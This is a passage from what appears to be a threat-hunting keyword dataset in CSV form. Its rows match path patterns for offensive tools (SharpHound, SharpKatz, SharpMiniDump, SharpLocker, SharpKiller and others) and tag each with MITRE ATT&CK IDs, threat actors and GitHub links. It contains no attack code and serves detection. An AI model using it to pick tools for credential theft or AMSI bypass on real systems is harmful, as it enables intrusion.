fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10992" "*/SharpHandler.py*",".{0,1000}\/SharpHandler\.py.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","10993" "*/SharpHide.exe*",".{0,1000}\/SharpHide\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10994" "*/SharpHide.git*",".{0,1000}\/SharpHide\.git.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","10995" "*/SharpHide.git*",".{0,1000}\/SharpHide\.git.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","10996" "*/SharpHose.exe*",".{0,1000}\/SharpHose\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10997" "*/SharpHose.exe*",".{0,1000}\/SharpHose\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10998" "*/SharpHose.exe*",".{0,1000}\/SharpHose\.exe.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","1","N/A","N/A","10","4","312","62","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z","10999" "*/SharpHound.exe*",".{0,1000}\/SharpHound\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11000" "*/SharpHound.exe*",".{0,1000}\/SharpHound\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - 
TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11001" "*/SharpHound.exe*",".{0,1000}\/SharpHound\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11002" "*/SharpHound.exe*",".{0,1000}\/SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11003" "*/SharpHound.exe*",".{0,1000}\/SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharphound","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - 
TA0002 - TA0005","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11004" "*/SharpHound.ps1*",".{0,1000}\/SharpHound\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","11005" "*/SharpHound-v*.zip*",".{0,1000}\/SharpHound\-v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","11006" "*/SharpIncrease.exe*",".{0,1000}\/SharpIncrease\.exe.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/mertdas/SharpIncrease","1","1","N/A","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","11007" "*/SharpIncrease.git*",".{0,1000}\/SharpIncrease\.git.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","1","N/A","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","11008" "*/Sharpire.exe*",".{0,1000}\/Sharpire\.exe.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","11009" "*/SharpKatz.exe*",".{0,1000}\/SharpKatz\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11010" "*/SharpKatz.exe*",".{0,1000}\/SharpKatz\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11011" "*/SharpKatz.exe*",".{0,1000}\/SharpKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11012" "*/SharpKatz.exe*",".{0,1000}\/SharpKatz\.exe.{0,1000}","offensive_tool_keyword","SharpKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11013" "*/SharpKiller.git*",".{0,1000}\/SharpKiller\.git.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","11014" "*/Sharp-Killer.sln*",".{0,1000}\/Sharp\-Killer\.sln.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","11015" 
"*/SharpLAPS.exe*",".{0,1000}\/SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11016" "*/SharpLAPS.exe*",".{0,1000}\/SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpLAPS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11017" "*/SharpLAPS.exe*",".{0,1000}\/SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11018" "*/SharpLAPS.exe*",".{0,1000}\/SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","SharpLAPS","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpLAPS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11019" "*/SharpLDAP.git*",".{0,1000}\/SharpLDAP\.git.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","11020" "*/SharpLocker.exe*",".{0,1000}\/SharpLocker\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - 
T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11021" "*/SharpLocker.exe*",".{0,1000}\/SharpLocker\.exe.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","1","N/A","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","11022" "*/SharpLocker.git*",".{0,1000}\/SharpLocker\.git.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","1","N/A","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","11023" "*/SharpLocker/releases/*",".{0,1000}\/SharpLocker\/releases\/.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","1","N/A","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","11024" "*/SharpLocker/zipball/*",".{0,1000}\/SharpLocker\/zipball\/.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","1","N/A","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","11025" 
"*/SharpLogger.exe*",".{0,1000}\/SharpLogger\.exe.{0,1000}","offensive_tool_keyword","SharpLogger","Keylogger written in C#","T1056.001 - T1056.003","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/djhohnstein/SharpLogger","1","1","N/A","N/A","10","2","126","41","2019-12-13T04:40:56Z","2018-12-18T01:45:17Z","11026" "*/Sharpmad.exe*",".{0,1000}\/Sharpmad\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Sharpmad","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11027" "*/Sharpmad.exe*",".{0,1000}\/Sharpmad\.exe.{0,1000}","offensive_tool_keyword","Sharpmad","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Sharpmad","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11028" "*/SharpMapExec.exe*",".{0,1000}\/SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11029" "*/SharpMapExec.exe*",".{0,1000}\/SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11030" "*/SharpMapExec.exe*",".{0,1000}\/SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","1","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","11031" "*/SharpMapExec.git*",".{0,1000}\/SharpMapExec\.git.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","1","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","11032" "*/SharpMiniDump.exe*",".{0,1000}\/SharpMiniDump\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - 
T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11033" "*/SharpMiniDump.exe*",".{0,1000}\/SharpMiniDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11034" "*/SharpMiniDump.git*",".{0,1000}\/SharpMiniDump\.git.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","1","N/A","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","11035" "*/SharpMove.exe*",".{0,1000}\/SharpMove\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11036" "*/SharpMove.exe*",".{0,1000}\/SharpMove\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpMove","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11037" "*/SharpMove.exe*",".{0,1000}\/SharpMove\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11038" "*/SharpMove.exe*",".{0,1000}\/SharpMove\.exe.{0,1000}","offensive_tool_keyword","SharpMove","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - 